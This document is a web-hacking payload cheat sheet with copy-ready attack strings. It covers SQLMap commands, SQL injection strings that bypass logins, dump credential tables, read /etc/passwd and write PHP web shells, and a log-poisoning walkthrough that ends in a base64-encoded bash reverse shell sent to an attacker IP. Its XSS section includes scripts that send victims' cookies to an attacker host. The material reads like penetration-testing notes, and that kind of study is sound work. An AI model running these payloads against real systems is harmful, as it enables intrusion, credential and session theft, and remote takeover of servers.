Web Hacking Payloads

SQL Injection with SQLMap

# Download the request using Burp and initialize SQLMap with it
sqlmap -r <request>
# If success enumerate databases
sqlmap -r <request> --dbs
# Enumerate tables of specific database
sqlmap -r <request> -D <database> --tables
# Dump content of table
sqlmap -r <request> -D <database> -T <table> --dump
# SQLMap without asking for user intput
sqlmap -u "http://www.example.com/vuln.php?id=1" --batch
# SQLMap with POST Request
sqlmap 'http://www.example.com/' --data 'uid=1&name=test'
# SQLMap with Cookie header
sqlmap 'http://www.example.com/' --cookie='PHPSESSID=ab4530f4a7d10448457fa8b0eadac29c'
# Database schema enumeration
sqlmap -u "http://www.example.com/?id=1" --schema
# SQLMap with custom Cookie ID Header
sqlmap 'http://www.target.com/file.php?id=1' --cookie="id=1*" --dump --batch
# SQLMap with PUT request
sqlmap -u www.target.com --data='id=1' --method PUT
# SQLMap with basic DB enumeration
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba
# SQLMap spawning a OS Shell
sqlmap -u "http://www.example.com/?id=1" --os-shell
# SQLMap writing a file
sqlmap -u "http://www.example.com/?id=1" --file-write "shell.php" --file-dest "/var/www/html/shell.php"
# SQLMap reading a local file
sqlmap -u "http://www.example.com/?id=1" --file-read "/etc/passwd"
# SQLMap specify a prefix or sufix 
sqlmap -u "www.example.com/?q=test" --prefix="%'))" --suffix="-- -"
# Specify columns
sqlmap -u "http://www.target.com/file.php?id=1" --union-cols=5 --dump --batch
# Anti-CSRF token bypass
sqlmap -u "http://www.example.com/" --data="id=1&csrf-token=WfF1szMUHhiokx9AHFply5L2xAOfjRkE" --csrf-token="csrf-token"
# Skip WAF
sqlmap -r req --dump --batch --skip-waf
# Randomize UA
sqlmap -r req --dump --batch --random-agent
# Tamper scripts

SQLi

# ------ Bypass login forms --------
# Basic Auth Bypass
' or 1=1-- -
admin' or '1'='1
admin')-- -

# ------ Union injection ------
# Basic User/Pass enumeration
1' UNION SELECT username, password from passwords-- 
# Detect number of columns using order by
' order by 1-- -
# Detect number of columns using Union injection
cn' UNION select 1,2,3-- -
# Basic Union injection
cn' UNION select 1,@@version,3,4-- -
# Union injection for 4 columns
UNION select username, 2, 3, 4 from passwords-- -

# ------ Blind SQLi ------
# Boolean-based Blind SQLi
' AND 1=1 -- - 
' AND 1=2 -- - 
# Time-based Blind SQLi
SELECT SLEEP(5)
# Error-based Blind SQLi
' OR (SELECT CASE WHEN (ASCII(SUBSTRING((SELECT database()),1,1)) = 'a') THEN CAST('' AS INT) ELSE 'a' END) -- ';

# ------ DB Enumeration ------
# Fingerprint MySQL with query output
SELECT @@version
# Fingerprint MySQL with no output
SELECT SLEEP(5)
# Current database name
cn' UNION select 1,database(),2,3-- -
# List all databases
cn' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
# List all tables in a specific database
cn' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
# List all columns in a specific table
cn' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
# Dump data from a table in another database
cn' UNION select 1, username, password, 4 from dev.credentials-- -

# ------ Privileges ------
# Find current user
cn' UNION SELECT 1, user(), 3, 4-- -
# Find if user has admin privileges
cn' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
# Find if all user privileges
cn' UNION SELECT 1, grantee, privilege_type, is_grantable FROM information_schema.user_privileges WHERE grantee="'root'@'localhost'"-- -
# Find which directories can be accessed through MySQL
cn' UNION SELECT 1, variable_name, variable_value, 4 FROM information_schema.global_variables where variable_name="secure_file_priv"-- -

# ------ File Injection ------
# Read local file
cn' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
# Write a string to a local file
select 'file written successfully!' into outfile '/var/www/html/proof.txt'
# Write a web shell into the base web directory
cn' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
' UNION SELECT 1, '<?php system($_REQUEST[0]); ?>', 3, 4, 5 INTO OUTFILE '/var/www/html/shell.php'-- -

LFI To RCE: Log Poisoning

# After finding the LFI vulnerability
http://domain.com/example.php?file=/var/log/apache2/access.log
# Modify the headers injecting PHP code
curl -s -H "User-Agent: <?php system('whoami'); ?>" "http://domain.com/example.php?file=/var/log/apache2/access.log"
# SSH Auth.log poisoning
http://domain.com/example.php?file=/var/log/auth.log
# Create Reverse TCP Shell in a b64 string
echo "bash -i >& /dev/tcp/<IP>/<PORT> 0>&1" | base64
# Example output:
YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMS4xMjgvMTkyMCAwPiYxCg==
# Create the payload to pipe it with bash
echo "YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMS4xMjgvMTkyMCAwPiYxCg==" | base64 -d | bash
# Inject it into the SSH logs using PHP code through SSH
ssh '<?php system("echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEyMS4xMjgvMTkyMCAwPiYxCg== | base64 -d | bash"); ?>'@<IP>
# Start the listener
nc -lvnp <PORT>
# Reload the page and you'll receive the shell

RFI

XSS Payloads

# Regular XSS Payloads
<script>alert("XSS")</script>
# DOM XSS Payloads
<img src="" onerror=alert(window.origin)>
<iframe src=javascript:alert(document.domain)>
<a href="javascript:alert(document.cookie)">Click me</a>
# Session Hijacking Payloads
<script src=http://OUR_IP></script>
'><script src=http://OUR_IP></script>
"><script src=http://OUR_IP></script>
javascript:eval('var a=document.createElement("script");a.src="http://OUR_IP";document.body.appendChild(a)')
<script>$.getScript("http://OUR_IP")</script>
# Cookie hijacking payloads
<script>document.write('<img src="http://OUR_IP:PORT/collect.jpg?cookie=' + document.cookie + '">')</script>
<script>fetch("http://OUR_IP:PORT/?cookie=" + document.cookie)</script>
<script>(new Image()).src="http://OUR_IP:PORT/?cookie="+document.cookie</script>
<img src=1 onerror="document.location='http://IP:PORT/asd/'+ document.cookie"><\img>
# Attribute Injection
"><script>alert("XSS")</script>
' onmouseover=alert("XSS") x='
# Encoded Payloads
%3Cscript%3Ealert("XSS")%3C/script%3E
&lt;img src=x onerror=alert("XSS")&gt;

Command Injection